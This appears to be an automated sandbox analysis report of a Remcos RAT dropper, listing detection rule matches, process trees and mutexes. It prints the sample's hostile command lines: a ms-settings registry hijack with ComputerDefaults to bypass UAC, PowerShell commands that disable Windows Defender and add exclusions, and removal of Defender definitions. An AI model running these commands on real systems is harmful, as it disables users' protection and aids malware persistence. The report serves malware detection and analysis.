                        Source: Process Memory Space: bound.exe PID: 1860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPEDMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPEDMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: libcrypto-3.dll.21.dr | Static PE information: Section: UPX1 ZLIB complexity 0.999059198943662
                        Source: libssl-3.dll.21.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9916915494109948
                        Source: python312.dll.21.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9992940650795991
                        Source: sqlite3.dll.21.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9977444556451613
                        Source: unicodedata.pyd.21.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9945046482974911
                        Source: libcrypto-3.dll.39.dr | Static PE information: Section: UPX1 ZLIB complexity 0.999059198943662
                        Source: libssl-3.dll.39.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9916915494109948
                        Source: python312.dll.39.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9992940650795991
                        Source: sqlite3.dll.39.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9977444556451613
                        Source: unicodedata.pyd.39.dr | Static PE information: Section: UPX1 ZLIB complexity 0.9945046482974911
                        Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@108/171@11/7
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A041FA GetLastError,FormatMessageW | 10_2_00A041FA
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Code function: 0_2_0040348F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 0_2_0040348F
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009F2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError | 10_2_009F2010
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009F1A0B AdjustTokenPrivileges,CloseHandle | 10_2_009F1A0B
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009F2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError | 13_2_009F2010
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 13_2_009F1A0B AdjustTokenPrivileges,CloseHandle | 13_2_009F1A0B
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001A2010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError | 20_2_001A2010
                        Source: C:\Users\user\AppData\Roaming\wsruwii | Code function: 20_2_001A1A0B AdjustTokenPrivileges,CloseHandle | 20_2_001A1A0B
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Code function: 0_2_00404822 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW | 0_2_00404822
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_009FDD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification | 10_2_009FDD87
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Code function: 0_2_004021A2 CoCreateInstance | 0_2_004021A2
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Code function: 10_2_00A03A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource | 10_2_00A03A0E
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Projected
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1904:120:WilError_03
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5896:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6820:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4336:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2484:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3608:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5476:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1188:120:WilError_03
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Mutant created: \Sessions\1\BaseNamedObjects\s
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7024:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1804:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3844:120:WilError_03
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6072:120:WilError_03
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-ZZZU66
                        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2536:120:WilError_03
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | File created: C:\Users\user\AppData\Local\Temp\nsaBCEC.tmp
                        Source: Og1SeeXcB2.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Windows\System32\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | File read: C:\Users\desktop.ini
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: DE5A.exe, DE5A.exe, 00000016.00000002.2472172339.00007FFDFFE91000.00000040.00000001.01000000.00000016.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                        Source: Og1SeeXcB2.exe | ReversingLabs: Detection: 18%
                        Source: DE5A.exe | String found in binary or memory: set-addPolicy
                        Source: DE5A.exe | String found in binary or memory: id-cmc-addExtensions
                        Source: DE5A.exe | String found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
                        Source: DE5A.exe | String found in binary or memory: OINT: if this variable is set to 0, it disables the default debugger. It can be set to the callable of your debugger of choice. These variables have equivalent command-line options (see --help for details): PYTHONDEBUG
                        Source: DE5A.exe | String found in binary or memory: --help
                        Source: DE5A.exe | String found in binary or memory: --help
                        Source: DE5A.exe | String found in binary or memory: can't send non-None value to a just-started async generator
                        Source: DE5A.exe | String found in binary or memory: can't send non-None value to a just-started generator
                        Source: DE5A.exe | String found in binary or memory: can't send non-None value to a just-started coroutine
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | File read: C:\Users\user\Desktop\Og1SeeXcB2.exe
                        Source: unknown | Process created: C:\Users\user\Desktop\Og1SeeXcB2.exe "C:\Users\user\Desktop\Og1SeeXcB2.exe"
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exit
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1181
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "perulesserpalacecorrespondence" Video
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Outlook + Imports 1181\U
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif 1181\End.pif 1181\U
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif | Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif
                        Source: C:\Windows\SysWOW64\PING.EXE | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknown | Process created: C:\Users\user\AppData\Roaming\wsruwii C:\Users\user\AppData\Roaming\wsruwii
                        Source: C:\Windows\explorer.exe | Process created: C:\Users\user\AppData\Local\Temp\DE5A.exe C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Users\user\AppData\Local\Temp\DE5A.exe C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "computerdefaults --nouacbypass"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ComputerDefaults.exe computerdefaults --nouacbypass
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ComputerDefaults.exe "C:\Windows\system32\ComputerDefaults.exe" --nouacbypass
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ComputerDefaults.exe "C:\Windows\system32\ComputerDefaults.exe" --nouacbypass
                        Source: C:\Windows\System32\ComputerDefaults.exe | Process created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wevtutil.exe wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg delete hkcu\Software\Classes\ms-settings /f"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg delete hkcu\Software\Classes\ms-settings /f
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "start bound.exe"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exe
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                        Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe "C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exe"
                        Source: C:\Users\user\AppData\Roaming\WindowsUpdateServices\WindowsUpdateServices.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe "c:\program files (x86)\internet explorer\iexplore.exe"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                        Source: C:\Users\user\Desktop\Og1SeeXcB2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Hwy Hwy.cmd & Hwy.cmd & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe" Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 1181Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "perulesserpalacecorrespondence" Video Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Outlook + Imports 1181\UJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif 1181\End.pif 1181\UJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1Jump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifJump to behavior
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pif C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1181\End.pifJump to behavior
                        Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe C:\Users\user\AppData\Local\Temp\DE5A.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe C:\Users\user\AppData\Local\Temp\DE5A.exe
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "computerdefaults --nouacbypass"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg delete hkcu\Software\Classes\ms-settings /f"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /d "C:\Users\user\AppData\Local\Temp\DE5A.exe" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add hkcu\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe computerdefaults --nouacbypass
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ComputerDefaults.exe "C:\Windows\system32\ComputerDefaults.exe" --nouacbypass
                        Source: C:\Windows\System32\ComputerDefaults.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Users\user\AppData\Local\Temp\DE5A.exe "C:\Users\user\AppData\Local\Temp\DE5A.exe"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wevtutil.exe wevtutil qe "Microsoft-Windows-Windows Defender/Operational" /f:text
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete hkcu\Software\Classes\ms-settings /f
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\DE5A.exe'"
                        Source: C:\Users\user\AppData\Local\Temp\DE5A.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
